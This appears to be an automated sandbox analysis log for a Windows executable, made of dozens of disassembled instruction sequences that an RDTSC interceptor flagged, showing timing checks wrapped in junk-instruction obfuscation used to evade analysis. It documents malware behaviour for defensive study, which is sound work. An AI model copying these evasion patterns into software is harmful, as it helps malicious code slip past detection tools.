Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D583 second address: C6D60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D3233h], edi 0x00000010 push esi 0x00000011 pop ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr [ebp+122D2782h], esi 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FA22C516E38h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 xor di, B47Ch 0x00000045 sub ebx, 790F6826h 0x0000004b mov eax, dword ptr [ebp+122D0D29h] 0x00000051 movzx edi, ax 0x00000054 push FFFFFFFFh 0x00000056 mov bl, F0h 0x00000058 nop 0x00000059 jnp 00007FA22C516E40h 0x0000005f push eax 0x00000060 pushad 0x00000061 jmp 00007FA22C516E41h 0x00000066 push eax 0x00000067 push edx 0x00000068 push edi 0x00000069 pop edi 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6E500 second address: C6E505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6E505 second address: C6E50C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C71485 second address: C71532 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA22C835FA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FA22C835FA8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 call 00007FA22C835FADh 0x0000002c jmp 00007FA22C835FAFh 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FA22C835FA8h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e sub ebx, dword ptr [ebp+122D27C6h] 0x00000054 push 00000000h 0x00000056 push 00000000h 0x00000058 push esi 0x00000059 call 00007FA22C835FA8h 0x0000005e pop esi 0x0000005f mov dword ptr [esp+04h], esi 0x00000063 add dword ptr [esp+04h], 00000017h 0x0000006b inc esi 0x0000006c push esi 0x0000006d ret 0x0000006e pop esi 0x0000006f ret 0x00000070 xchg eax, esi 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FA22C835FADh 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7075C second address: C70773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C71532 second address: C7154F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA22C835FB0h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6E5EA second address: C6E5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C70773 second address: C70793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7154F second address: C7155F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA22C516E36h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15D7C second address: C15D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA22C835FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15D86 second address: C15D9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15D9D second address: C15DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FA22C835FC9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15DB0 second address: C15DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15DB4 second address: C15DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7514C second address: C751D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FA22C516E38h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov edi, ecx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FA22C516E38h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 jp 00007FA22C516E3Bh 0x0000004b mov bx, dx 0x0000004e xchg eax, esi 0x0000004f push edx 0x00000050 jmp 00007FA22C516E42h 0x00000055 pop edx 0x00000056 push eax 0x00000057 jbe 00007FA22C516E44h 0x0000005d push eax 0x0000005e push edx 0x0000005f push ecx 0x00000060 pop ecx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C716DC second address: C716E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C716E0 second address: C716E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7541E second address: C75438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C772DF second address: C772F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FA22C516E38h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C782D0 second address: C782D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C782D4 second address: C782DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C77478 second address: C7747C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C782DA second address: C782E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7752E second address: C7754B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C782E9 second address: C7834C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA22C516E40h 0x0000000e nop 0x0000000f mov dword ptr [ebp+124726C0h], eax 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D3608h] 0x0000001d and ebx, dword ptr [ebp+122D281Eh] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FA22C516E38h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D19B3h], ecx 0x00000045 or dword ptr [ebp+1244E0A0h], edx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push esi 0x0000004f pushad 0x00000050 popad 0x00000051 pop esi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7754B second address: C77551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C791DA second address: C79256 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov esi, dword ptr [ebp+122D298Ah] 0x00000010 popad 0x00000011 and di, 4A17h 0x00000016 push 00000000h 0x00000018 mov edi, 780BD665h 0x0000001d jns 00007FA22C516E3Ch 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007FA22C516E38h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f js 00007FA22C516E38h 0x00000045 mov edi, ecx 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 pushad 0x0000004a js 00007FA22C516E36h 0x00000050 jmp 00007FA22C516E3Ah 0x00000055 popad 0x00000056 jno 00007FA22C516E3Ch 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 pushad 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C79256 second address: C7925B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7938C second address: C79390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C79390 second address: C79394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C79394 second address: C7939A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7946D second address: C79481 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jc 00007FA22C835FA6h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7A4B7 second address: C7A4D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7B536 second address: C7B54D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA22C835FADh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C83DB9 second address: C83DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C83DBD second address: C83DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA22C835FA8h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FA22C835FA8h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007FA22C835FAFh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8B381 second address: C8B3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b jnc 00007FA22C516E4Eh 0x00000011 pushad 0x00000012 jmp 00007FA22C516E40h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8B3A5 second address: C8B3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007FA22C835FB5h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8B3C7 second address: C8B3F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FA22C516E3Dh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jnl 00007FA22C516E36h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8B3F6 second address: C8B3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91E2E second address: C91E40 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FA22C516E36h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1E431 second address: C1E440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1E440 second address: C1E45A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E44h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91099 second address: C9109D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9109D second address: C910A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C910A3 second address: C910B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FA22C835FA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C910B3 second address: C910B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C910B7 second address: C910BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91397 second address: C9139D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91674 second address: C91696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FA22C835FA6h 0x00000009 jmp 00007FA22C835FB7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9181C second address: C91839 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA22C516E36h 0x00000008 jmp 00007FA22C516E43h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91977 second address: C91981 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C835FA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91981 second address: C919AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FA22C516E42h 0x0000000f jns 00007FA22C516E36h 0x00000015 jns 00007FA22C516E36h 0x0000001b jmp 00007FA22C516E40h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C919AC second address: C919B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA22C835FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C919B6 second address: C919BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91C99 second address: C91C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91C9D second address: C91CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C982AA second address: C982BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA22C835FA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C982BE second address: C982EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E49h 0x00000009 popad 0x0000000a jc 00007FA22C516E42h 0x00000010 jno 00007FA22C516E36h 0x00000016 je 00007FA22C516E36h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9EBEB second address: C9EC0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FA22C835FACh 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f jmp 00007FA22C835FAAh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9D92D second address: C9D93C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9D93C second address: C9D941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DBE2 second address: C9DC53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA22C516E48h 0x0000000e pop edi 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FA22C516E48h 0x00000018 je 00007FA22C516E36h 0x0000001e popad 0x0000001f pushad 0x00000020 jnl 00007FA22C516E36h 0x00000026 jmp 00007FA22C516E42h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DDA9 second address: C9DDD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA22C835FB9h 0x0000000d jne 00007FA22C835FA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DDD0 second address: C9DDD6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DDD6 second address: C9DDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA22C835FB5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DDF5 second address: C9DDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9E1E9 second address: C9E205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FABh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jp 00007FA22C835FA6h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9E381 second address: C9E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E3Eh 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FA22C516E43h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA22C516E45h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9E3C0 second address: C9E3C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9E54B second address: C9E54F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4026C second address: C4027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007FA22C835FAEh 0x0000000b jno 00007FA22C835FA6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4027F second address: C40299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E44h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40299 second address: C402A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA22C835FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CEC3 second address: C5CEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CEC7 second address: C5CECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CECD second address: C5CED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CED3 second address: C5CEE9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA22C835FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FA22C835FA6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CEE9 second address: C5CEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D437 second address: C5D43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D43B second address: C5D441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D441 second address: C5D446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D4DE second address: C5D4E8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA22C516E3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
